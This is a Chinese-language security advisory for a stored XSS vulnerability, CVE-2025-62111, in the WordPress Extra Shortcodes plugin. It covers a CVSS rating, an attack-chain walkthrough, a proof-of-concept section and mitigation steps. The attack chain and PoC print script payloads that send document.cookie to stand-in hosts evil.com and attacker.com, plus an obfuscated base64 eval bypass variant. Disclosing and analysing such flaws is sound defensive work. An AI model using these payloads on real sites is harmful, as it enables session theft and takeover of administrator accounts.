CVE-2025-62111 WordPress Extra Shortcodes插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62111

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress Extra Shortcodes插件（extra-shortcodes）

漏洞概述

CVE-2025-62111是WordPress Extra Shortcodes插件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由于插件在处理用户输入时未正确对特殊字符进行转义或过滤，导致恶意JavaScript代码被存储在数据库中。当其他用户访问包含恶意代码的页面时，浏览器会执行这些脚本，从而实现会话劫持、Cookie窃取、钓鱼攻击等恶意操作。由于该插件的Shortcodes功能在WordPress文章和页面中被广泛使用，攻击者可以通过在评论或表单中注入恶意代码，影响所有访问该内容的用户。此漏洞需要低权限用户身份即可实施，且攻击过程对用户不可见，具有较高的隐蔽性和危害性。

技术细节

该漏洞存在于Extra Shortcodes插件的extra-shortcodes功能模块中，具体表现为在处理用户提交的内容时，未对输入的特殊HTML字符（如<、>、'、"等）进行充分的转义处理。攻击者可以利用该漏洞在Shortcode参数或内容中嵌入恶意JavaScript代码，这些代码会被永久存储在WordPress数据库中。当页面渲染时，Web服务器将包含恶意代码的HTML响应发送给受害者浏览器，浏览器将其解析为可执行脚本。以WordPress Shortcode机制为例，攻击者可能通过在文章内容中插入类似[extra_shortcode attr="<script>alert(document.cookie)</script>"]的短代码，触发XSS执行。由于存储型XSS的持久性，攻击只需进行一次，受害者每次访问受感染页面都会触发恶意脚本。攻击者常利用此漏洞窃取管理员会话Cookie，进而获得后台管理权限。

攻击链分析

STEP 1

步骤1：侦察与目标识别

攻击者识别目标网站使用的WordPress Extra Shortcodes插件版本，确认版本≤2.2且存在XSS漏洞。

STEP 2

步骤2：恶意Payload注入

攻击者以低权限用户身份（如订阅者）在文章评论、Shortcode输入字段或表单中注入包含恶意JavaScript代码的Payload，如<script>fetch('https://evil.com/?c='+document.cookie)</script>。

STEP 3

步骤3：数据持久化

由于插件未正确过滤输入，恶意代码被直接存储到WordPress数据库中，形成持久化攻击点。

STEP 4

步骤4：受害者访问触发

当其他用户（管理员或普通访客）访问包含恶意Shortcode的页面时，服务器返回包含恶意代码的HTML响应。

STEP 5

步骤5：脚本执行与数据窃取

受害者浏览器将恶意内容解析为JavaScript并执行，攻击者成功窃取Cookie、会话令牌或进行钓鱼操作。

STEP 6

步骤6：权限提升与控制

攻击者利用窃取的会话冒充管理员登录后台，可能进一步上传webshell获取服务器完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62111 PoC - WordPress Extra Shortcodes Stored XSS -->
<!-- 攻击者可在Shortcode输入字段中注入以下恶意代码 -->

<!-- 示例1：通过Shortcode属性注入 -->
[extra_shortcode attr='"><script>alert(document.cookie)</script>']

<!-- 示例2：通过Shortcode内容注入 -->
[extra_shortcode]<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>[/extra_shortcode]

<!-- 示例3：绕过过滤的变形Payload -->
[extra_shortcode attr='<img src=x onerror=eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))>']

<!-- 修复后应输出为转义形式： -->
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;

影响范围

Extra Shortcodes 插件 <= 2.2

防御指南

临时缓解措施

在官方修复版本发布前，可临时采取以下措施：将Extra Shortcodes插件替换为功能类似的可靠替代品；禁用或删除该插件；通过Web应用防火墙配置XSS攻击检测规则阻断恶意请求；对所有用户输入实施严格的白名单验证；限制低权限用户在文章/页面中插入Shortcode的能力；加强管理员会话管理并启用双因素认证以降低会话劫持风险。